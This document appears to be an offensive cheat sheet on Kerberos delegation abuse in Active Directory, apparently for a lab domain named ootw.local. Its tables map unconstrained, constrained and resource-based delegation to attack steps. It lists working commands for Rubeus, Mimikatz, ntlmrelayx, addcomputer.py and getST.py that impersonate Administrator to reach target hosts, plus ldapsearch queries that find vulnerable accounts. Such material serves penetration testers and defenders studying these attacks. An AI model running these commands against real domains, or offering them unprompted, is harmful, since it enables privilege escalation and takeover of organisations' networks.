| Type | Configured on | Main attribute | What we need | Kerberos flow | Linux abuse | Windows abuse | Main risk |
|---|---|---|---|---|---|---|---|
| Unconstrained delegation | Delegating account or computer | TRUSTED_FOR_DELEGATION | Compromise the delegated host, then wait for or coerce users/computers to authenticate | Victim TGT is cached on the delegated host | Coerce authentication, extract tickets if tooling and access permit | Rubeus.exe monitor, Rubeus.exe dump, Mimikatz ticket extraction | Any delegated TGT can be reused to access services as that principal |
| Constrained delegation with protocol transition | Delegating account | TRUSTED_TO_AUTH_FOR_DELEGATION and msDS-AllowedToDelegateTo | Control the delegating account password, hash, AES key, or TGT | S4U2Self then S4U2Proxy | getST.py -spn <allowed_spn> -impersonate <user> | Rubeus.exe s4u /impersonateuser:<user> /msdsspn:<allowed_spn> | Impersonate arbitrary users to allowed SPNs |
| Constrained delegation without protocol transition | Delegating account | msDS-AllowedToDelegateTo without protocol transition flag | Control delegating account and capture a real user TGS to the front-end service | S4U2Proxy only with captured user service ticket | Limited, depends on captured TGS handling | Rubeus.exe s4u /tgs:<captured_tgs> /msdsspn:<allowed_spn> | Impersonate only users whose front-end service tickets were captured |
| Service-name substitution | Final service ticket | Cleartext sname in returned TGS | A valid delegated ticket to one service class on the same host/account | Modify final service class with altservice | getST.py -altservice cifs/<host> | Rubeus.exe s4u /altservice:cifs | Convert a less useful service ticket into CIFS, LDAP, HTTP, or HOST when service keys match |
| RBCD | Target computer object | msDS-AllowedToActOnBehalfOfOtherIdentity | Write access to target computer object and control of a principal with an SPN | S4U2Self then S4U2Proxy | addcomputer.py, rbcd.py or ntlmrelayx.py --delegate-access, getST.py | Powermad, PowerView raw security descriptor, Rubeus s4u | Gain service tickets to the target as a chosen user |
| RBCD through relay | Target computer object | msDS-AllowedToActOnBehalfOfOtherIdentity | Relay a machine or user to LDAP/LDAPS with permission to write RBCD | LDAP write then S4U | ntlmrelayx.py -t ldaps://dc --delegate-access --escalate-user <machine$> | Usually staged from Linux relay tooling | Turn coercion plus LDAP relay into target-host compromise |
| S4U2Self computer takeover | Computer account TGT | Computer account key or stolen TGT | A computer TGT for the target computer | S4U2Self with /self, then service substitution | Usually easier from Windows tooling | Rubeus.exe s4u /self /altservice:cifs/<host> | Convert a captured computer TGT into usable local service access as an impersonated user |
Decision table
| Finding | Next action |
|---|---|
TRUSTED_FOR_DELEGATION on a non-DC host | Compromise host, monitor for TGTs, coerce high-value authentication |
msDS-AllowedToDelegateTo and protocol transition enabled | Control delegating account, run S4U as target user |
msDS-AllowedToDelegateTo without protocol transition | Capture a real user TGS to the front-end service, then S4U2Proxy |
Writable msDS-AllowedToActOnBehalfOfOtherIdentity on a computer | Create or control SPN principal, write RBCD, request S4U ticket |
| MachineAccountQuota greater than zero | Create controlled machine account for RBCD if no SPN principal is available |
| Delegation target is not useful | Try altservice to request or substitute CIFS, LDAP, HTTP, HOST, or WSMAN on the same host/account |
UAC flags
| Flag | Decimal | Meaning |
|---|---|---|
TRUSTED_FOR_DELEGATION | 524288 | Unconstrained delegation |
TRUSTED_TO_AUTH_FOR_DELEGATION | 16777216 | Protocol transition for constrained delegation |
NOT_DELEGATED | 1048576 | Account is sensitive and cannot be delegated |
Quick commands
| Goal | Command |
|---|---|
| Find all delegation | findDelegation.py ootw.local/student:'student' -dc-ip 10.10.10.200 |
| Find unconstrained | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=524288)' sAMAccountName dNSHostName servicePrincipalName userAccountControl |
| Find constrained | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToDelegateTo=*)' sAMAccountName msDS-AllowedToDelegateTo userAccountControl |
| Find protocol transition | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' sAMAccountName userAccountControl msDS-AllowedToDelegateTo |
| Find RBCD already set | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))' distinguishedName sAMAccountName msDS-AllowedToActOnBehalfOfOtherIdentity |
| Create machine | addcomputer.py -computer-name 'ATTACKER01$' -computer-pass 'Password123!' -dc-ip $DC ootw.local/student:'student' |
| Abuse constrained delegation | getST.py -spn 'cifs/server.ootw.local' -impersonate Administrator -dc-ip $DC 'ootw.local/svc_delegate:Password123!' |
| Abuse RBCD | getST.py -spn 'cifs/target.ootw.local' -impersonate Administrator -dc-ip $DC 'ootw.local/ATTACKER01$:Password123!' |